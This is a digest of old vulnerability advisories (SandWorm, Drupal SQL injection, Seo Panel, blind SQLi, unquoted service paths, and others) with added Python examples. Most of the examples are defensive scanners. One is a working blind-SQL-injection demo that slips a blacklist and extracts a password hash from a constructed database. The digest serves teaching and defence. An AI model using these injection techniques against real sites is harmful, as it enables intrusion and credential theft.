This exploit builder is a quick and ugly exploit for the SandWorm vulnerability, CVE-2014-4114. It runs on Linux/macOS, and its output was tested against Windows 7 SP1 64-bit with Microsoft Office 2013 Plus. It patches the oleObject1.bin and oleObject2.bin files of the PoC so that they point at the attacker's host, share and dropper file, then zips the modified PoC into a .ppsx file.
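The builder's output is a zip with rewritten OLE objects, so the thing a responder wants is a check that opens a .ppsx, walks the ppt/embeddings/oleObject*.bin members and reports any UNC (\\host\share\...) reference they carry. The following Python is an added example, not the builder's code or the PoC; the sample document, the 192.0.2.10 host, the share name and the file names are constructed placeholders, and the scanner tries both 8-bit and UTF-16LE text so it does not depend on how the path is stored.

```python
import io
import re
import zipfile

# A UNC path: \\host\share\rest-of-path, terminated by NUL, quote or line break.
UNC_RE = re.compile(r'\\\\[A-Za-z0-9._-]+\\[^\x00"<>|\r\n]+')


def unc_paths_in_blob(blob: bytes) -> set:
    """Return the UNC paths found in an OLE object blob.

    The path may be stored as 8-bit text or as UTF-16LE, so both decodings
    are searched; a UTF-16LE string never matches in the 8-bit view (every
    other byte is NUL) and vice versa, so there are no double hits."""
    found = set()
    for text in (blob.decode('latin-1'), blob.decode('utf-16-le', errors='ignore')):
        for m in UNC_RE.finditer(text):
            found.add(m.group(0).rstrip())
    return found


def scan_ppsx(data: bytes) -> dict:
    """Map each ppt/embeddings/*.bin member of a .ppsx/.pptx to the UNC paths it embeds."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith('ppt/embeddings/') and name.lower().endswith('.bin'):
                paths = unc_paths_in_blob(zf.read(name))
                if paths:
                    report[name] = sorted(paths)
    return report


def scan_ppsx_file(path: str) -> dict:
    with open(path, 'rb') as fh:
        return scan_ppsx(fh.read())


def build_sample_ppsx() -> bytes:
    """Constructed stand-in for a crafted .ppsx (not the real PoC): a minimal zip
    whose two OLE blobs reference a remote share, one in UTF-16LE, one in 8-bit."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as zf:
        zf.writestr('[Content_Types].xml', '<Types/>')
        zf.writestr('ppt/slides/slide1.xml', '<p:sld/>')
        zf.writestr('ppt/embeddings/oleObject1.bin',
                    b'\x00' * 16 + '\\\\192.0.2.10\\share\\slide1.gif'.encode('utf-16-le') + b'\x00\x00')
        zf.writestr('ppt/embeddings/oleObject2.bin',
                    b'\x00' * 16 + b'\\\\192.0.2.10\\share\\slides.inf\x00')
    return buf.getvalue()


if __name__ == '__main__':
    for member, paths in scan_ppsx(build_sample_ppsx()).items():
        print(member, '->', ', '.join(paths))
```

Any hit is worth a look: a legitimately embedded OLE object carries its payload inside the document and has no reason to reference a remote share.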
Aireplay-ng 1.2 beta3 contains a stack-based buffer overflow in the "tcp_test" function, reached through the "aireplay-ng --test" option. The length parameter taken from the packet is not checked against the size of the stack buffer before the data is read into it, so a specially crafted packet causes the stack to be overwritten with attacker-controlled data and allows a remote attacker to execute arbitrary code on the target system.
A vulnerability has been found in SAP NetWeaver that could allow an unauthenticated, remote attacker to cause a denial of service. It is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the 'Standalone Enqueue Server' service, part of SAP NetWeaver Application Server ABAP/Java. The Standalone Enqueue Server is a critical component of a SAP NetWeaver installation in terms of availability: taking it down renders the whole SAP system unresponsive.
This exploit injects malicious SQL into a vulnerable Drupal website. The SQL is sent as part of a specially crafted POST request; the site executes it, which lets the attacker gain access to the website.
This exploit is based on the SA-CORE-2014-005 vulnerability in Drupal 7.x. It was inspired by yukyuk's PoC and tested on Drupal 7.31 from BackBox 3.x. It uses a custom hash routine to generate a non-truncated Drupal 7 compatible password hash.
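The exploit's own hash routine is not reproduced on the page. As an added example, not the exploit's code, here is a Python re-implementation of the Drupal 7 "$S$" password scheme from includes/password.inc (SHA-512 iterated 2^15 times over a phpass-style 8-character salt, phpass base64 output, result cut to DRUPAL_HASH_LENGTH = 55), so that "Drupal 7 compatible" is concrete: a hash produced this way verifies under user_check_password(), which re-hashes with the stored 12-character setting prefix and compares the truncated strings. Function names and the `check` helper are this example's own.

```python
import hashlib
import os
from typing import Optional

# Alphabet, iteration-count encoding and stored length as in Drupal 7's password.inc.
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
DRUPAL_HASH_COUNT = 15      # log2 of the SHA-512 iteration count (2**15 rounds)
DRUPAL_HASH_LENGTH = 55     # Drupal keeps only this many characters of the output


def password_base64_encode(data: bytes) -> str:
    """phpass base64: every 3 input bytes become 4 alphabet chars, little-endian, no padding."""
    out = []
    count = len(data)
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
        if i >= count:
            break
    return ''.join(out)


def drupal7_hash(password: str, setting: Optional[str] = None) -> str:
    """Return a Drupal 7 '$S$' hash.

    `setting` is the 12-character prefix '$S$' + count char + 8-char salt; when it is
    omitted a fresh random salt is generated, exactly as _password_generate_salt() does."""
    if setting is None:
        setting = '$S$' + ITOA64[DRUPAL_HASH_COUNT] + password_base64_encode(os.urandom(6))
    setting = setting[:12]
    count_log2 = ITOA64.index(setting[3])
    salt = setting[4:12]
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    full = setting + password_base64_encode(digest)   # 12 + 86 = 98 characters
    return full[:DRUPAL_HASH_LENGTH]                   # Drupal stores the truncated form


def drupal7_check(password: str, stored_hash: str) -> bool:
    """Mirror user_check_password(): re-hash with the stored setting and compare."""
    return stored_hash.startswith('$S$') and drupal7_hash(password, stored_hash) == stored_hash


if __name__ == '__main__':
    h = drupal7_hash('admin')
    print(h, drupal7_check('admin', h))
```

A fixed setting such as `'$S$D' + 'abcdefgh'` makes the output deterministic, which is what a test or an exploit wants; the count character 'D' is ITOA64[15].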
A persistent input validation web vulnerability has been discovered in the official Indeed.com mobile web application (API). It allows remote attackers to inject their own malicious script code into the application side of the vulnerable module. The injection is performed with a POST request and the attack vector is located on the application side. The security risk is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 3.6. Exploitation requires no user interaction and no privileged application user account. Successful exploitation results in session hijacking, persistent phishing attacks, persistent redirects to external malicious sources, and persistent manipulation of the affected or connected module context.
This vulnerability affects Seo Control Panel (Seo Panel) version 3.6.0. There are multiple vulnerabilities in the project, not all of them exploitable. The following exploit bypasses the implemented protection, a set of regular expressions combined with a blacklist; the payload used by this exploit gets past it easily. The exploited method is __getSeoPluginInfo in seo-plugins.php, lines 175 to 178, where the database client API is used incorrectly.
While the administrator is logged in, clicking the provided link causes the device to reboot.
A blind SQL injection vulnerability has been found and confirmed in the software as an anonymous user. A successful attack could allow an anonymous attacker to read information stored in the database, such as usernames and password hashes. The following URL and parameter have been confirmed to suffer from blind SQL injection:

GET /?ym_download_id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wfvt_2871549622=5434f2560126f; wpfront-notification-bar-landingpage=1; bp-activity-oldestpage=1; __utma=9793911.1350365293.1412756050.1412756050.1412756050.1; __utmb=9793911.1.10.1412756050; __utmc=9793911; __utmz=9793911.1412756050.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); all_RyDwsSBXVzZXJzGOTe_u0CDA-clickdesk_referrer=http%3A//www.google.com.vn/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26ved%3D0CB0QFjAA%26url%3Dhttp%253A%252F%252Fsdj
Connection: keep-alive
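Two of the entries above describe the same class of flaw from different angles: the Seo Panel note (a regex blacklist that a payload slips past, because the query is built by string concatenation instead of through the database API's parameters) and this one (a boolean-blind injection in a single GET parameter that yields password hashes). The following Python is an added, self-contained demonstration of both, not code from either project: the SQLite schema, the seeded hash, the `ym_download_id` handler and the blacklist regex are all constructed for the example, and the payload is not the one the Seo Panel exploit uses. It shows a filter of that shape being bypassed with comment-separated tokens, a hash being recovered one character at a time through a true/false page difference, and the same handler with a bound parameter, against which the oracle yields nothing.

```python
import re
import sqlite3

SEEDED_HASH = '$P$BpoCxAmpLe0123456789abcdefghij.'   # constructed value, not a real hash


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (not the real schema)."""
    conn = sqlite3.connect(':memory:')
    conn.executescript(f"""
        CREATE TABLE downloads(id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO downloads VALUES (1, 'Member guide'), (2, 'Price list');
        CREATE TABLE wp_users(user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES ('admin', '{SEEDED_HASH}');
    """)
    return conn


# Hypothetical regex blacklist of the kind described for Seo Panel: rejects quotes,
# statement/comment terminators, and whitespace-separated SELECT ... FROM / UNION SELECT.
BLACKLIST = re.compile(r"['\";]|--|#|\bunion\s+select\b|\bselect\s+.+?\s+from\b", re.IGNORECASE)


def passes_filter(value: str) -> bool:
    return BLACKLIST.search(value) is None


def vulnerable_download(conn, ym_download_id: str):
    """Flawed handler: run the blacklist, then concatenate the parameter into the SQL."""
    if not passes_filter(ym_download_id):
        return None
    sql = "SELECT title FROM downloads WHERE id = " + ym_download_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def fixed_download(conn, ym_download_id: str):
    """Hardened handler: the parameter is bound, so it is data and never parsed as SQL."""
    row = conn.execute("SELECT title FROM downloads WHERE id = ?", (ym_download_id,)).fetchone()
    return row[0] if row else None


def oracle(conn, condition: str, handler=vulnerable_download) -> bool:
    """True iff download 1 comes back, i.e. iff the injected condition is true."""
    return handler(conn, "1 AND (" + condition + ")") is not None


def bsearch(conn, expr: str, lo: int, hi: int, handler=vulnerable_download) -> int:
    """Binary-search the integer value of a SQL expression known to lie in [lo, hi)."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(conn, f"{expr} >= {mid}", handler):
            lo = mid
        else:
            hi = mid
    return lo


# SQLite treats /**/ as a token separator, so this subquery contains no whitespace
# for the blacklist's \s+ to match, yet parses exactly like the spaced form.
TARGET = "(SELECT/**/user_pass/**/FROM/**/wp_users/**/LIMIT/**/1)"


def extract_first_hash(conn, handler=vulnerable_download) -> str:
    """Recover the first user_pass value one printable character at a time."""
    length = bsearch(conn, f"length({TARGET})", 0, 256, handler)
    chars = [chr(bsearch(conn, f"unicode(substr({TARGET},{pos},1))", 32, 127, handler))
             for pos in range(1, length + 1)]
    return ''.join(chars)


if __name__ == '__main__':
    db = make_db()
    print('vulnerable handler:', extract_first_hash(db))
    print('fixed handler:     ', repr(extract_first_hash(db, fixed_download)))
```

Against the concatenating handler the extraction costs a few hundred requests (8 for the length, 7 per character); against the bound-parameter handler every oracle query is false and the loop returns an empty string, which is the point of using the API's parameters rather than a filter.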
The O2 Connection Manager's service suffers from an unquoted search path issue impacting the Import WiFi 'TGCM_ImportWiFiSvc' service for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application.
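The practical check for this class of issue is mechanical: read a service's ImagePath, confirm it is unquoted and contains spaces before the executable name, and list the paths Windows will try before reaching the real binary (each space-delimited prefix with .exe appended, e.g. C:\Program.exe, C:\Program Files\O2.exe). The following Python is an added example, not the vendor's or an advisory's code; the install path shown for TGCM_ImportWiFiSvc and the other ImagePath values are assumed, constructed to exercise the logic. Whether a candidate is actually exploitable depends on the non-privileged user being able to write to that candidate's directory, which this offline check does not test; on a live host that is an icacls question.

```python
def _exe_part(image_path: str) -> str:
    """The command line up to and including the executable name (arguments dropped)."""
    p = image_path.strip()
    end = p.lower().find('.exe')
    return p if end == -1 else p[:end + 4]


def is_unquoted_with_spaces(image_path: str) -> bool:
    """Precondition for unquoted-search-path abuse: no surrounding quotes, and a space
    somewhere in the executable's path."""
    p = image_path.strip()
    if p.startswith('"'):
        return False
    return ' ' in _exe_part(p)


def hijack_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, before the intended binary."""
    if not is_unquoted_with_spaces(image_path):
        return []
    parts = _exe_part(image_path).split(' ')
    return [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]


def audit_services(image_paths: dict) -> dict:
    """Given {service_name: ImagePath}, return only the services with a hijackable path."""
    report = {}
    for name, path in image_paths.items():
        cands = hijack_candidates(path)
        if cands:
            report[name] = cands
    return report


# Constructed sample of HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath values.
# The O2 path is an assumption for illustration, not the product's documented location.
SAMPLE_IMAGE_PATHS = {
    'TGCM_ImportWiFiSvc': r'C:\Program Files\O2 Connection Manager\TGCM_ImportWiFiSvc.exe',
    'Spooler': r'C:\Windows\System32\spoolsv.exe',
    'QuotedVendorSvc': r'"C:\Program Files\Some Vendor\svc.exe" -service',
    'UnquotedWithArgs': r'C:\Program Files\Some Vendor\svc.exe -k netsvcs',
}

if __name__ == '__main__':
    for svc, cands in audit_services(SAMPLE_IMAGE_PATHS).items():
        print(svc)
        for c in cands:
            print('   ', c)
```

Only the unquoted entries with a space before the executable name are reported; the quoted one and the System32 one are not, and arguments after the .exe do not add candidates.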